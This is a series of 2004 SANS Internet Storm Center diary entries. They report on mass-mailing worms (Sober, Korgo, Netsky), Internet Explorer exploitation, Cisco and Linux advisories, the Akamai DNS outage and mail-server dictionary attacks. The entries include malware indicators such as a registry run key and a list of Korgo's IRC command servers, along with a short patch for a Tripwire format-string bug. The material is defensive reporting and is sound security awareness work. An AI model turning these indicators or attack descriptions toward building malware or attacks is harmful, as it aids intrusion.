The ISC has received reports of several major ISPs suffering delays in the delivery of email due to a recent surge in worm activity. The specific worms referenced are Sober.H/Ascetic.A and Erkez/Zafi.B. You may remember Sober.H as being the source of large amounts of German-language political spam ( as reported here: http://isc.incidents.org/diary.php?date=2004-06-11 ). The volume of email created by these two worms beginning late last week slowed many mail servers to a crawl, creating a backlog of undelivered (but not undeliverable) mail. As the tide of email created by these two worms begins to recede, queued mail should be delivered and delivery times should return to normal.

-------------------

Cory Altheide, stunt-double for Dan Goldberg

Handler on Duty

Cisco BGP DoS

Cisco released an advisory today announcing a denial-of-service vulnerability in their routers utilizing the BGP protocol. According to the advisory "unless the malicious traffic appears to be sourced from a configured, trusted peer, it would be difficult to inject a malformed packet." Enabling md5 authentication to defend against the previous BGP/TCP vulnerabilities ( http://isc.sans.org/diary.php?date=2004-04-20 ) should be sufficient to mitigate the risk presented by this new vulnerability. Full details and links to updated software are available from Cisco: http://www.cisco.com/warp/public/707/cisco-sa-20040616-bgp.shtml

Update: Local Linux Kernel DoS Fixed

The local denial-of-service vulnerability in the Linux kernel reported on the 14th ( http://isc.incidents.org/diary.php?date=2004-06-14 ) has been fixed in the newly released 2.6.7 kernel. Grab the patches from your nearest kernel.org mirror: http://www.kernel.org/mirrors/

Update: Akamai Press Release

Akamai has issued a press release to address the service outages (attributed to a DDoS - http://isc.incidents.org/diary.php?date=2004-06-15 ) which affected Akamai-hosted sites yesterday: http://www.akamai.com/en/html/about/press/press459.html

Continuing Report: Unpatched IE Vulnerabilities

This is ground that's been tread over and over again recently, but it bears repeating: We are continuing to receive reports of exploitation of unpatched vulnerabilities in Internet Explorer resulting in code execution and system compromise. Take whatever precautions you feel are necessary to avoid becoming a victim, and continue sending in detailed reports if and when you see these attacks in the wild.

----------------------

Cory Altheide

Handler on Duty

Akamai/Internet DNS Problems

Starting at around 8:30 am EDT (12:30 UTC), a number of sources started to report a widespread Akamai DNS issue. Large web sites, which use Akamai for its DNS service, no longer resolved in DNS, and became inaccessible to their users. The affected sites were Yahoo, Google, Microsoft, FedEx, Xerox, Apple and likely many others. The situation improved around 10:30 EDT, mainly because some of the affected domains temporarily switched from using Akamai DNS servers to their own DNS servers.

The problems seem to be attributable to a DDoS attack on Akamai's DNS servers, though we do not presently have the information to make a definitive assessment. According to the Akamai spokesperson, the problem was not limited to Akamai. He attributed the outage to an attack on the Internet infrastructure on a larger scale. We do not currently know of any sites that were affected by the attack without using Akamai's services.

*Posts to the NANOG mailing list regarding this issue:
http://www.merit.edu/mail.archives/nanog/msg05267.html

* The Washington Post article regarding the possible attack:
http://story.news.yahoo.com/news?tmpl=story&u=/washpost/20040615/tc_washpost/a43635_2004jun15
Continued Exploitation of IE URL Spoofing

Today's post to the Full Disclosure mailing list warned readers about a phishing scam that directed its victims to a well-designed website that posed as the U.S. Bank site. The site uses an Internet Explorer flaw to place text outside the rendered page window and over the URL location bar, leading victims to believe that they are actually visiting a real banking site. The exploit cleverly calculates where to position the text, and works surprisingly well for most installations of Internet Explorer. Other browsers are not affected by the problem, as far as we know.

The U.S. Bank-spoofing site uses the same exploit as the PayPal-spoofing site reported recently on a Broadband Reports forum. The same exploit was used by another PayPal-spoofing site that we saw several weeks ago. These attack vectors are based on the Bugtraq post that dates to approximately a year ago. We are alarmed at the increased number of exploit sightings in the wild, and are not aware of an Internet Explorer that corrects this issue.

* Today's Full Disclosure mailing list post:
http://seclists.org/lists/fulldisclosure/2004/Jun/0449.html

* The initial Bugtraq mailing list post:
http://www.securityfocus.com/archive/1/328947

* The Broadband Reports forum mention of the scam:
http://www.dslreports.com/forum/news,45692~mode=full~days=2000

Re-Released MS04-011 Patch for NT 4.0 Workstations using Pan Chinese Language

Microsoft re-released its MS04-001 patch, initially issued in April 2004, to address issues with Windows NT 4.0 Workstation systems that use the Pan Chinese language. According to the security bulletin, "this issue only affects the Pan Chinese language version of the update and only those versions of the update are being re-released. Other language versions of this update are not affected and are not being re-released." (http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx)

ISC Site Under Heavy Load

Visitors to our site may have experienced intermittent load problems today because of the high number of visitors who accessed our site today. These connectivity problems were not directly related to the Akamai outage. Thanks for being patient while waiting for the ISC site to load.

Large Websites Unreachable (update. added June 15th 9:41 am EDT)

Several sources worldwide report that large websites, among them
Yahoo, Microsoft and Google, are currently not reachable due to DNS problems.

It is suspected at this time that the root cause is a problem with
Akamai's DNS service

(see the diary for the 15th for more updates)
http://isc.sans.org/diary.php?date=2004-06-15
Linux kernel local DoS

A local crash against Linux kernels on x86 has been released. Working
code has been released that crashes affected kernels (latest 2.4 and
2.6). The program has been confirmed to crash kernels protected with
the Openwall and grsecurity kernel patches. If you run a public shell
server, it would be wise to patch your kernel now.

For full details and patching information:

http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html

Though the weekend has been quiet, there has been some traffic from various sources about new email borne mass-mailing viruses, or the fallout of those viruses. This provides a good time to remind those in security that people are still falling for the same old tricks in email.



Neglecting the worms that break through vulnerabilities in the OS or email browser, we still have way too many new viruses that are spread by click-happy end users. The new methods used by virus writers recently (like forging the from address from any of the ones found on the computer in many locations) has proved to be very difficult to explain to the masses of less tech savvy users. The same old tricks eem to continue to come up over and over and over again, and yet the message seems to have not changed from the security community.
1) Keep your patches and antivirus definitions updated quite frequently.

2) Do _NOT_ open attachments that you were not expecting or can confirm was sent intentionally through other means (ie phone or yelling over a cubicle wall...etc).




Though this is a rehash of what most of us know already, it is well worth taking a time out during this seemingly quiet summer and see if we can find a better way to get the point across to the masses of individuals that are not security minded. For those in the University / Academia world, we have a matter of a couple of months to prepare for the onslaught of highly clever students who have not been properly educated on safe computing habits (freshman).
If the amount of traffic I have personally seen is any measure, it is my belief that we are loosing the battle on educating our users. Is it time to look for better ways of educating our end users on the dangers of attachments? Probably so. What exactly needs to be done, is not known at this time. But the facts of the matter are this. 1) Virus writers continue to become even more sneaky with the mass mailing virus breed. 2) Users continue to run programs they receive from email. 3) There will always be a lag time between discovery of a virus and the time that definitions are made available for AV software. With those 3 issues, the only solution is to tackle this problem without depending on virus definitions for protection. If anyone has any ideas for better getting the point across to end users, please do not hesitate sharing them with the world.

We have had one report of a user receiving traffic on multicast addresses
244.1.0.0 with a negative source port and a destination port of 4. Some
firewalls translate the source port to 0. We are interested in any one else
seeing similar traffic and packet traces.

The source of German right wing spam making its round on the Internet
the last few days has been identified as a variant of the sober worm. It
is identified by a file called datacrypt.exe and is launched in the registry
HKLM/software/microsoft/windows/currentversion/run/ The infection
method is the same as Sober.G. On start up it connects to a time server
in Berlin and then begins to send email messages.

Reports are being received relating to vulnerabilities in Realplayer services.
You may wish to block the ports listed below that the realplayer
services uses on firewalls. That will not completely mitigate this
vulnerability as it could be triggered by downloading (via http,ftp ...)
a realplayer movie and running it locally. I would recommend until
realplayer is patched on any vulnerable system that you disable
realplayer as the default application for opening .RA, .RM, .RV or
.RMJ. In XP you can do that by browsing to your c: drive and selecting a
folder then from the tool bar select folder options and file types. Look
for files opened by realplayer and change those to be opened by another
application or to not have a default application.

Well Known ports used by realservers.

TCP port 7070 for connecting to pre-G2 RealServers
TCP port 554 and 7070 for connecting to G2 RealServers
UDP ports 6970 - 7170 (inclusive) for incoming traffic only

German Language SPAM
The ISC has received several reports German language SPAM being received in large quantities. Analysis by the ISC's Johannes Ulrich shows the content of the samples received to be political in nature, and seem to have been generated by DSL/Cable connected systems, a possible indication that a virus or botnet is being used to propagate the SPAM.

Of note, one of the e-mails contained the phrase "Comment by the author of Sober"

Update: We captured the malware behind this. It is a version of
Sober. Right now, only one virus scanner identifies it as such. The
version we obtained uses the filename 'datacrypt.exe'.
For More Information
For more information on stopping spam and e-mail issues in general, take a look at the 'e-mail issues' section of the SANS Reading Room located at:

http://www.sans.org/rr/catindex.php?cat_id=19

IE Vulnerability
A security advisory released at the Secunia website reports the exploitation in the wild of a vulnerability in Internet Explorer that could lead to a system compromise.

According the advisory "Two vulnerabilities have been reported in Internet Explorer, which in combination with other known issues can be exploited by malicious people to compromise a user's system."
This possible new IE vulnerability has been discussed in the Full Disclosure list about some days ago, and according Secunia is actively being exploited in the wild to install adware on user's systems.
Since there is no official patch for this vulnerability, a solution is to disable Active Scripting for all but trusted web sites.
Reference: http://secunia.com/advisories/11793/

MS Patches issues
We received a report from a user about issues installing the Microsoft Patches
released yesterday. According the user, after installing the patches in W2k SP3 and SP4 he noticed problems like "loading the patch MS Word documents could no longer be launched using Internet Explorer 5.5 and above."

Although we didnt find any other problems related to this, it is a good practice to test the patches deployment before apply in production machines.
Cisco CatOS SSH/Telnet/HTTP vulnerabilities
Cisco released a security advisory about a vulnerability in CatOS that could lead to a Denial of Service in the running device.
"A TCP-ACK DoS attack is conducted by not sending the regular final ACK required for a 3-way TCP handshake to complete, and instead sending an invalid response to move the connection to an invalid TCP state. This attack can be initiated from a remote spoofed source.
This vulnerability is currently known to be exploitable only if you have the Telnet, HTTP or SSH service configured on a device which is running Cisco CatOS."
Reference: http://www.cisco.com/warp/public/707/cisco-sa-20040609-catos.shtml

ISC Webcast

Did you miss todays ISC Monthly Webcast?

Check the archives at: http://www.sans.org/webcasts/show.php?webcastid=90489

-----------------------------------------------------

Handler on Duty: Pedro Bueno (bueno_AT_ieee.org)

Microsoft Security Bulletins
Today two (2) security bulletins were released on the regularly scheduled patch day. The 2 vulnerabilities that were addressed were both listed as Moderate by Microsoft.
Bulletin MS04-016 (KB839643) involves the Microsoft DirectX versions 7.0a-9.0b on Windows 2000, XP and 2003 and potentially could be a non-critical problem for Windows 98 through ME. The vulnerability if exploited could cause the DirectPlay application to fail and require the user to restart the application to resume functionality.
For more information on the vulnerability or for patches please see: http://www.microsoft.com/technet/security/bulletin/MS04-016.mspx
Bulletin MS04-017 (KB842689) involves a potential Denial of Service and/or Information Disclosure for those customers that use Visual Studio .Net 2003, Outlook 2003 with Business Contact Manager or the Business Solutions Customer Relationship Management (CRM 1.2). The vulnerability involves a problem with web interfaces in Crystal Report or Crystal Enterprise that is re-distributed as a part of the above programs. If these products are used in your environment, this set of patches should be evaluated for installation in your regularly scheduled patch cycle this month.
For more information on the vulnerability or for patches please see: http://www.microsoft.com/technet/security/bulletin/MS04-017.mspx
Monthly Threat Update Webcast

Wednesday June 9th, 2 pm EDT (8pm CEST). For details, see
http://www.sans.org/webcasts/show.php?webcastid=90489

VBS.Pub Worm


Symantec is reporting a mass-mailing VBScript worm dubbed "VBS.Pub". While the worm doesn't possess any earth-shattering characteristics to make it a significant propagation threat, it will delete all the files on an infected host if the day is the 6th, 13th, 21st, or 28th.

http://www.sarc.com/avcenter/venc/data/vbs.pub.html



RTT Measurement Probes


One submission reported a probe that had an in-addr.arpa address of "performance-probe.Internap.THIS-IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.
BGP-route-control.data393.net"

While we don't recommend assuming traffic is harmless just because the DNS name says it is, this particular probe is the likely result of a round-trip-time (RTT) measurement by routing optimization company Internap. Organizations like Internap regularly use ICMP traffic to measure RTT characteristics to best manage customer traffic to avoid congested network access points and is unlikely to be malicious in nature.


ARIN in-addr.arpa


A post on the NANOG list indicates that the American Registry for Internet Numbers (ARIN, www.arin.net) is not providing reverse-lookup forwarding for any networks in the range 206.46.0.0 - 255.255.0.0. A quick "whois -h whois.arin.net 206.46.0.0" indicates this is a correct assessment at the time of this writing.

This issue is problematic for organizations who are blocking SMTP traffic from hosts that do not have matching forward and reverse DNS entries, since it is not currently possible to resolve these addresses from the authoritative source. This may result in the lack of mail delivery from host originating in this address range. This appears to be primarily affecting Verizon customers, who delegate addresses in this range to customers. No word from ARIN on the reason for the outage at this time.

http://www.merit.edu/mail.archives/nanog/msg04861.html



IE Exploits


We have received multiple notices indicating that fully-patched Windows hosts are becoming compromised due to various Internet Explorer flaws, which may be used to turn compromised systems into SPAM relay engines, load popup marketing advertisements, install keystroke loggers and countless other malicious activities. An incomplete list of alternative browsers can be found at http://download.com.com/3150-2356-0.html?tag=dir .



Just a reminder that tomorrow is Terpsichorean-Tuesday, where Microsoft is expected to announce patches to Windows and associated products.


--Joshua Wright/Handler on duty

Quiet day

Today has been a very quiet day. The kind that makes you wonder what it is you're not seeing. Since there's nothing else going on, I figured that a reminder of the upcoming patch release and a note about Cymru's Darknet project would suffice.


Microsoft patch day coming

Microsoft's monthly planned patch release date is on Tuesday the 8th. I am not aware of patches that are going to be released, but as always, it is important to be aware of the patch date and be prepared to ensure that patches are applied expediently.


Darknet Project

Team Cymru recently published their site about their Darknet project. This is a project that is interested in capturing traffic to non-existent hosts or networks in order to increase an awareness and understanding of unsolicited traffic on your network. More information can be found at http://www.cymru.com/Darknet/

----------------------------

T. Brian Granier

Handler on Duty

Oracle EBusiness Suite Vulnerabilities

Vulnerabilities have been discovered in Oracle EBusiness Suite. According to Integrigy report, there are several input validation vulnerabilities in Oracle E-Business Suite. They can be remotely exploited by using a browser and sending a specially crafted URL to the vulnerable system. Successful exploiting the vulnerabilities could lead to the compromise of the whole database and application.

Oracle has issued a fix. For more information, please refer to:

http://www.integrigy.com/alerts/OraAppsSQLInjection.htm

http://otn.oracle.com/deploy/security/pdf/2004alert67.pdf



Netgear WG602 Accesspoint Vulnerability

A vulnerability has been discovered in the Netgear WG602 Accesspoint. According to Tom Knienieder, the device contains a default administrative account. A remote user who can access to the web interface of the device will be able to login using the default account and gain control of the device.

At this point of writing, there is no solution for this vulnerability. You should restrict web access to the device or disable the web interface on the device if possible.

http://seclists.org/lists/fulldisclosure/2004/Jun/0071.html



Harry Potter and the Worm of Doom

With the recent release of the latest Harry Potter film, there have been reports in the increase of the old Netsky.P virus which can disguise itself as a Harry Potter game or book. Do be aware and do not let the popularity of Harry Potter to cast a nasty spell on your computer.

http://asia.cnet.com/newstech/security/0,39001150,39181869,00.htm

http://news.bbc.co.uk/2/hi/technology/3773443.stm

http://www.vnunet.com/news/1155604

http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci968651,00.html

Update from yesterday

A reader pointed out that our report on the Linksys LAN DoS yesterday applies only in the default configuration. If the LAN settings are changed from the default, the exploit (as published) will not work. In particular, the subnet, DHCP range, and router address should be changed from the defaults. This is fairly simple to accomplish through the web interface.


The importance of prompt patching

Today, the handler on duty, spent most of his day tracking down machines on a client's network that were still not updated with the MS04-011 and MS04-012 patches from Microsoft's April bulletins which had become infected with Korgo and Plexus worms which exploit the LSASS vulnerability. I'm going to rant a little because these patches have been available for nearly eight weeks. I promise not to rant about this again until the next time. :-) In all fairness, this client was successful in patching better than 90% of their systems (and 100% for servers), but there were systems that control machinery or for some other reason were set aside as too valuable to risk taking down. The machines are critical to the job the customer does and hence the customer is hesitant to take them down for patching becuase they are up running all the time. The point that is missed, though is that as long as these machines actually connect to the enterprise WAN, they remain very exposed and the potential malicious activity of the worm/exploit could be far more devistating than actaully scheduling some down time on the shop floor to patch. One of these worms could cause data damage or actual phyisical damage by misdirecting the controlled machinary. In the wrong instances this could even lead to loss of life. As has been proposed a number of times and in many other forums, machines handling critical infrastructure (or espeically critical life-saving equipment), if they must be networked, should be on networks that are completely disjoint from the company WAN and especially the internet. It isn't a bad thing to put air gaps between them.


Reminder, Microsoft will release more patches on Tuesday.



----------------------------

Jim Clausing, jim.clausing at acm.org

Denial of Service Vulnerabilities in Linksys Routers

Alan McCaig of www.b0f.net reported two local denial of service vulnerabilities in the following models of Linksys routers:

Linksys BEFSR41

Linksys BEFSRU31

Linksys BEFSR11

Linksys BEFSX41

Linksys BEFSR81 v2/v3

Linksys BEFW11S4 v3

Linksys BEFW11S4 v4


The threat posed by these vulnerabilities is mitigated somewhat, as they are apparently only exploitable from the LAN side of the router. However, they will leave the device in a deadlocked state requiring a reset to factory defaults to return to working order. If the user has made significant modifications beyond these defaults this would likely be the source of much chagrin.

Currently, the only fix is to not randomly click on untrusted links.

Format String Vulnerability in Tripwire

Paul Herman <pherman@frenchfries.net> released information regarding the mishandling of filenames passed into email reports generated by Tripwire. Although the author states that no exploit currently exists, this information is especially concerning as Tripwire is generally used on machines the administrators would like to maintain a higher-than-normal level of security on. Vulnerable versions are:

Tripwire commercial versions <= 2.4
Tripwire open source versions <= 2.3.1

Paul also included a patch for the open source version of Tripwire:

Index: src/tripwire/pipedmailmessage.cpp

===================================================================

retrieving revision 1.1

retrieving revision 1.2

diff -u -r1.1 -r1.2

--- src/tripwire/pipedmailmessage.cpp 21 Jan 2001 00:46:48 -0000 1.1

+++ src/tripwire/pipedmailmessage.cpp 26 May 2004 20:59:15 -0000 1.2

@@ -180,7 +180,7 @@



void cPipedMailMessage::SendString( const TSTRING& s )

{

- if( _ftprintf( mpFile, s.c_str() ) < 0 )

+ if( _ftprintf( mpFile, "%s", s.c_str() ) < 0 )

{

TOSTRINGSTREAM estr;

estr << TSS_GetString( cTripwire,
tripwire::STR_ERR2_MAIL_MESSAGE_COMMAND )



Users are encouraged to patch or disable email alerting to maintain the integrity of their systems.

Cory Altheide

Handler on Duty

Korgo worm variant

Some days ago we received some reports about probes for port 113.
Today Symantec upgraded the Korgo .F variant from a Category 2 to Category 3, "due to an increased rate of submissions".

This worm bot variant explores the Microsoft Windows LSASS Buffer Overrun Vulnerability (MS04-011). According to Symantec it also listens on port 113, 3067 and other random ports.

The F-secure Weblog reports about a .G version.

When active, the worm tries to connect on the following IRC servers on port 6667:

irc.kar.net

gaspode.zanet.org.za

lia.zanet.net

irc.tsk.ru

london.uk.eu.undernet.org

washington.dc.us.undernet.org

los-angeles.ca.us.undernet.org

brussels.be.eu.undernet.org

caen.fr.eu.undernet.org

flanders.be.eu.undernet.org

graz.at.eu.undernet.org

gaz-prom.ru

moscow-advokat.ru


And join the #waffen-ss channel to create a bot with a random name.
References: http://www.sarc.com/avcenter/venc/data/w32.korgo.f.html

http://www.europe.f-secure.com/v-descs/korgo_g.shtml
-----------------------------------------------

Handler on duty: Pedro Bueno (bueno_AT_ieee.org)

Port 16191 Fragment Update

James Fields alerted us to the following advice provided by Cisco to
avoid the "Port 16191 Fragmentation" issue. He forwarded the following
quote from a Cisco engineer:

"To avoid this problem try changing the FragmentReassembly settings ( try increasing 'IPReassembleMaxFrags' ). You will probably also need to change the 'FragmentThreshold' settings for these signatures."

mail server dictionary attacks

While not new, the number of reported dictionary attacks against mail servers
is up. These attacks are characterized by spam being sent to random users at a particular domain. The amount of inbound mail may in itself cause some mail
servers to die or slow down to a crawl. If the mail server sends bounce notices for unavailable accounts, they frequently are directed to invalid email addresses and causing another bounce in reply (which will end up in the postmaster's inbox if the mail server is configured correctly).

This issue has been discussed over the last few days at one of our mailing lists: http://lists.sans.org/pipermail/list/2004-May/031574.php .

There are a number of possible defenses against these attacks. Turning off
"mailbox not available" notices may be one method, but it will also prevent
such notices to valid e-mail senders who typed an e-mail address incorrectly.

Rate limiting traffic to mail servers on a per-IP basis is a simple solution for most firewalls.

If you are using software like spamassassin, you may want to consider delivering e-mail to its 'learn' feature for some of the most popular
spam recipients.

Tom Liston, one of our ISC handlers, recorded the frequency of userids
used in e-mail sent to an unused domain: http://isc.sans.org/presentations/spam_scan.txt
Top 10 Signs that you are infected

It is usually quite hard to find out if a system is "clean" or "compromised".
Quite frequently, we are confronted with users that blame regular odd OS
crashes on an infection, while on the other hand it takes others months to figure out that they are 0wn3d. This list is NOT intended as a final
version, but more as a request for comment.

The first 5 signs are more intended for home users, while the second set
requires some instrumentation (IDS/Firewall).

(1) Your system shuts down spontaneously frequently, even if you don't use it.

(2) Your internet connection slows to a crawl even while you are not doing anything significant.

(3) Your Virus scanner crashes and can not be started again.

(4) You are no longer able to visit Anti Virus sites.

(5) Your hard disk fills up and you can't find the files that use up all the disk space.
(6) Your system all for sudden attempts to connect to random IRC servers.

(7) Your mail server is extremely busy processing outbound mail.

(8) nightly incremental backups are all for sudden much larger then usual.

(9) New user accounts show up and nobody knows who added them.

(10) A given server (web/ftp/mail) keeps crashing for no apparent reason.


----

Johannes Ullrich, jullrich_AT_sans.org